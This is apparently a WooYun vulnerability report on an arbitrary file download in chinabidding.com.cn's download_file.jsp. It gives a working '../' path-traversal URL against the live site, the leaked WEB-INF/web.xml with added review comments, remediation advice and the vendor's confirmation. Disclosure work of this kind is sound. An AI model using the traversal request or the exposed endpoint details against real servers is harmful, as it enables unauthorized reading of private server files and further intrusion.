
漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118646

漏洞标题:中国采购与招标网主站任意文件下载

相关厂商:中国采购与招标网

漏洞作者: 路人甲

提交时间:2015-06-09 11:33

修复时间:2015-07-24 13:56

公开时间:2015-07-24 13:56

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

一组下载

详细说明:

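从下面的返回内容看,download_file.jsp 对请求中的 filepath 参数没有做过滤或规范化,其中的 ../ 可以跳出下载目录,配合 filename 参数即可读取到本不应对外提供的 WEB-INF/web.xml:

http://www.chinabidding.com.cn/download/download_file.jsp?record_id=4231669&filename=web.xml&filepath=../../../WEB-INF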


2.jpg

1.jpg


<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- Deployment descriptor of the web application, as returned by the download request
     quoted above. It lives under WEB-INF, which a servlet container does not serve to
     clients directly, so its contents are normally visible only on the server. -->
<web-app>
<!-- Shared section: start -->
<!-- TemplateLoad: started with the application (load-on-startup 1); its templates.path
     init-param names a properties file under WEB-INF/conf. -->
<servlet>
<servlet-name>TemplateLoad</servlet-name>
<servlet-class>com.cbl.lib.InitTemplateServlet</servlet-class>
<init-param>
<param-name>templates.path</param-name>
<param-value>WEB-INF/conf/templates.properties</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>TemplateLoad</servlet-name>
<url-pattern>/TemplateLoad</url-pattern>
</servlet-mapping>
<!-- Attribute-style servlet declaration, unlike the element form used for most servlets
     in this file (container-specific syntax, possibly Resin: confirm). No servlet-mapping
     for MapDataServlet appears in this file. -->
<servlet servlet-name='MapDataServlet'
servlet-class='jbs.runat.MapDataServlet'>
<load-on-startup>2</load-on-startup>
</servlet>
<!-- Disabled servlet declaration, left in place by the original author. -->
<!--
<servlet servlet-name='RepairLoginoutServlet'
servlet-class='jbs.listener.RepairLoginoutServlet'>
<load-on-startup>3</load-on-startup>
</servlet>
-->
<!-- NOTE(review): presumably turns off the container's directory-listing servlet;
     confirm against the container documentation. -->
<directory-servlet>none</directory-servlet>
<!-- Shared section: end -->
<!-- Front-end (public site) section: start -->
<!-- Binds the taglib URI "oscache" to the TLD file stored under WEB-INF/classes. -->
<taglib>
<taglib-uri>oscache</taglib-uri>
<taglib-location>/WEB-INF/classes/oscache.tld</taglib-location>
</taglib>

<!-- ImgServlet, FbcgxxServlet and RegServlet are each mapped to a single URL ending in
     .jpg, so requests for those paths are answered by servlet code rather than by a
     static image file. -->
<servlet>
<servlet-name>ImgServlet</servlet-name>
<servlet-class>jbs.image.ImgServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ImgServlet</servlet-name>
<url-pattern>/zbw/zbxx/images/79.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FbcgxxServlet</servlet-name>
<servlet-class>jbs.image.FbcgxxServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FbcgxxServlet</servlet-name>
<url-pattern>/zbw/images/lk.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>RegServlet</servlet-name>
<servlet-class>jbs.image.RegServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegServlet</servlet-name>
<url-pattern>/zbw/member/images/register_27.jpg</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>XmlServlet</servlet-name>
<servlet-class>jbs.runat.CreateXmlServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>XmlServlet</servlet-name>
<url-pattern>/xml/manualCreateXml</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>MailServlet</servlet-name>
<servlet-class>jbs.runat.KfzxInfoAutoSentndServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>MailServlet</servlet-name>
<url-pattern>/zbw/sentmail</url-pattern>
</servlet-mapping>
<!-- Axis Web-Service Configuration Start -->
<!-- Three Apache Axis servlets are declared: AxisServlet (mapped to /servlet/AxisServlet,
     *.jws and /services/*), AdminServlet (loaded at startup, but its mapping is commented
     out further down) and SOAPMonitorService (mapped to /SOAPMonitor, SOAPMonitorPort 5001).
     NOTE(review): confirm that the web-service and monitoring endpoints are required in
     production; remove or restrict the ones that are not. -->

<servlet>
<servlet-name>AxisServlet</servlet-name>
<display-name>Apache-Axis Servlet</display-name>
<servlet-class>
org.apache.axis.transport.http.AxisServlet
</servlet-class>
</servlet>
<servlet>
<servlet-name>AdminServlet</servlet-name>
<display-name>Axis Admin Servlet</display-name>
<servlet-class>
org.apache.axis.transport.http.AdminServlet
</servlet-class>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet>
<servlet-name>SOAPMonitorService</servlet-name>
<display-name>SOAPMonitorService</display-name>
<servlet-class>
org.apache.axis.monitor.SOAPMonitorService
</servlet-class>
<init-param>
<param-name>SOAPMonitorPort</param-name>
<param-value>5001</param-value>
</init-param>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/servlet/AxisServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>SOAPMonitorService</servlet-name>
<url-pattern>/SOAPMonitor</url-pattern>
</servlet-mapping>
<!-- uncomment this if you want the admin servlet -->
<!--
<servlet-mapping>
<servlet-name>AdminServlet</servlet-name>
<url-pattern>/servlet/AdminServlet</url-pattern>
</servlet-mapping>
-->
<session-config>
<!-- Default to 5 minute session timeouts -->
<!-- NOTE(review): the comment above says 5 minutes, but the configured value is 1;
     the Servlet specification defines session-timeout in minutes. Confirm which value
     is intended. -->
<session-timeout>1</session-timeout>
</session-config>
<!-- Disabled listener declaration, left in place by the original author. -->
<!--
<listener>
<listener-class>
jbs.listener.OnlineCounterListener
</listener-class>
</listener>
-->
<!-- currently the W3C haven't settled on a media type for WSDL;
http://www.w3.org/TR/2003/WD-wsdl12-20030303/#ietf-draft
for now we go with the basic 'it's XML' response -->
<mime-mapping>
<extension>wsdl</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>

<mime-mapping>
<extension>xsd</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<!-- Welcome files are tried in the order listed. -->
<welcome-file-list id="WelcomeFileList">
<welcome-file>index.jsp</welcome-file>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jws</welcome-file>
</welcome-file-list>
<!-- Axis Web-Service Configuration End -->
<!-- Front-end (public site) section: end -->
<!-- Back-office (admin) section: start -->

<!-- FCKeditor file-manager connector: baseDir is /paihang_images/, debug is off, the
     allowed file extensions are jpg, gif, jpeg, png, bmp and swf, and the denied
     extension list is empty. -->
<servlet>
<servlet-name>Connector</servlet-name>
<servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
<init-param>
<param-name>baseDir</param-name>
<param-value>/paihang_images/</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value>|jpg|gif|jpeg|png|bmp|swf|</param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Connector</servlet-name>
<url-pattern>/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
</servlet-mapping>
<!-- The "permission" filter is the only filter declared in this file. It is mapped to
     /info/*, /provider/*, /association/*, /right/* and /sysmanage/* only; the /download/
     path of the endpoint quoted above is not among these patterns, so this filter does
     not run for it.
     NOTE(review): access control for every URL outside these patterns has to be enforced
     somewhere else; confirm that it is. -->
<filter>
<filter-name>permission</filter-name>
<filter-class>com.cbl.lib.Permission</filter-class>
</filter>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/info/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/provider/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/association/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/right/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>permission</filter-name>
<url-pattern>/sysmanage/*</url-pattern>
</filter-mapping>
<servlet>
<servlet-name>CreateAttentionHtmlServlet</servlet-name>
<servlet-class>jbs.runat.CreateAttentionHtmlServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CreateAttentionHtmlServlet</servlet-name>
<url-pattern>/CreateAttentionHtmlServlet</url-pattern>
</servlet-mapping>

<!-- All background tasks must finish between 23:00 and 01:00 -->
<!-- Attribute-style declaration with a run-at time of 23:50 (container-specific
     scheduling syntax, possibly Resin: confirm). -->
<servlet servlet-name='userTask'
servlet-class='jbs.runat.userTask'>
<run-at>23:50</run-at>
</servlet>
<!-- All background tasks must finish between 23:00 and 01:00 -->
<!-- Back-office (admin) section: end -->
</web-app>
文件没有发现!

漏洞证明:

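修复方案:

(原文未填写。)针对此类问题的通用做法:下载接口只接受 record_id,由服务端根据记录查出文件的实际存放位置,不再使用客户端传入的 filepath 和 filename;若必须保留路径参数,应先对拼接后的路径做规范化,确认其仍位于下载根目录之内,否则拒绝请求;同时确保 WEB-INF 等目录无法通过任何下载接口读取,并排查是否还有其他配置文件已被读取、其中的敏感信息是否需要更换。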

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-09 13:55

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无